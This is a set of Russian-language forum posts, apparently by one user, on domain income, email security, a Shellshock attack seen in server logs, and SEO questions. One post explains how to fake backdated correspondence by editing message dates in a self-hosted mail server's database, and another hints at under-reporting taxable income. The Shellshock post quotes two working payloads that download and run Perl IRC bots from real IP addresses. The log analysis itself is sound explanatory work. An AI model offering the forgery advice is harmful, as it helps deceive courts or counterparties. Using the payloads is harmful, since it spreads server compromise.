Несмотря на этот факт - лучше все же прикрыть срам документально. Договор аренды домена или какой нибудь формальный агентский - вполне хватит. Иначе нет никаких оснований для получения прибыли юрлицом от этого домена, а там, при должном усердии, можно физику незаконное предпринимательство накинуть. Минус - от доходов физика придется подоходный платить, но никто не заставляет большие суммы указывать.
Как уже выше сказали - настроить почту на своем домене. Проверить можно только дату регистрации домена. И поднять свой (именно свой а не гуглевый или яндексовый) почтовик, привязать к базе, накидать на почту писем и поправить их даты в базе. Все, проверить можно только перекрестной выгрузкой из почтовых ящиков отправителей, а они, я так понимаю - в юрисдикции другого государства :)---------- Добавлено 25.01.2016 в 20:12 ----------
Проблема не с безопасностью а с техническим уровнем пользователей. Читать почту с помощью ЛЮБОГО приложения небезопасно - в тот момент когда устройство попадает к злоумышленнику/органам - они получают доступ ко всей переписке. С этой точки зрения, как ни странно - web интерфейс намного безопаснее - главное не забывать разлогиниться. Переписка на устройство не сохраняется, в канал не вклиниться ( https у гмайла) + сайт добавлен в hsts-список (https://habrahabr.ru/post/216751/). Есть еще криптобоксы - но у них надежность такая же как у веб-интрефейса почты - измеряется в количестве ударов по почкам, которые в состоянии выдержать владелец ящика. Если парень крепкий - то и к веб-интерфейсу доступ не получат, если нет - то и криптобокс не поможет. Только в отличии от бокса - всегда есть возможность отдать пароль от другого ящика, c боксами тоже есть вариант с двойным содержимым, но это как нарвешься - инфа то уже на руках у злоумышленников и никуда ты ее уже не денешь. А у тупых силовиков могут работать умные технари, да...
Другое дело что рядовому пользователю это не надо, но если вдруг понадобилось - самое время расширить горизонты кругозора...
точно.. Я про bash помню а про cgi как то не сообразил...
() { :;}; /bin/bash -c "cd /tmp;lwp-download -a http://66.194.27.49/sports;curl -O http://66.194.27.49/sports;wget http://66.194.27.49/sports;perl /tmp/sports*;perl sports;rm -rf /tmp/sports*"
() { :;}; /bin/bash -c "cd /tmp;lwp-download -a http://172.245.218.130/log.zip;curl -O http://172.245.218.130/log.zip;wget http://172.245.218.130/log.zip;perl /tmp/log.zip*;perl log.zip;rm -rf /tmp/log.zip*"
Судя по этой строке:
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched mambo for ".$1." seconds.");
которую можно найти в файле log.zip который скачивается с адреса http://172.245.218.130/log.zip который указан у вас в логах - идет поиск уязвимых мамб. Причем после захвата скан продолжается в том числе и с новой зараженной жертвы. Если мамба у вас не стоит - можно спать спокойно. А вообще, конечно, треш и угар - делать eval с user-agent - это как надо было писать (я про мамбу) Там видимо регулярки с флагом e использовались - в приличном обществе за это пальцы вырывают вместе с сухожилиями на глазах у юных программистов, дабы неповадно было и дурному примеру не следовали.
От тематики зависит. На дорах Пикассо рулит и прочий сюрр - сбивает с толку алгоритмы поисковиков.
картинка передает только картиночный вес, ссылочный вес передается только ссылкой.
с точки зрения протокола http - это два разных урла. С точки зрения веб-сервера - это два разных урла. С точки зрения слегка образованного пользователя - это два разных урла - в случае адреса без слеша запрашивается какой то конкретный документ, в случае урла со слешем запрашивается какой то стартовый (индексный) документ в разделе, а им может быть index.htm(l)|php|js и вообще все то угодно.
Это может быть вообще структура построенная не на файлах а на другой абстракции, и по любому это будет два разных урла, приводимых к одному результату за счет дополнительной логики (переадресация, алиасы, rewrite rules и все такое)
если была привязка к каким либо реальным данным - можно. Я по скану паспорта восстановил в свое время доступ к ящику. Правда было это лет несколько назад и переписка заняла пару месяцев...
https://yandex.ru/support/passport/support-restore.xml там есть ссылка на анкету восстановления.
Это НЕ ССЫЛКА, по ней не может перейти пользователь, а значит никакого сигнала она не дает и вес передать не может.
гугль поймет:
, отсюда:https://developers.google.com/webmasters/control-crawl-index/docs/robots_txt
, но надо url-енкодить домены: https://blogs.bing.com/webmaster/2009/11/05/robots-speaking-many-languages/ (так что легче в punicode)
Яндекс тоже признается в русофобии но при этом открыто требует punycode, то есть idn не поймет:
отсюда:
https://yandex.ru/support/webmaster/yandex-indexing/cyrillic-urls.xml
Ну и на последок - надо внимательно смотреть, в какой кодировке сам роботс и какая указана в хидерах, естественно, они должны совпадать.
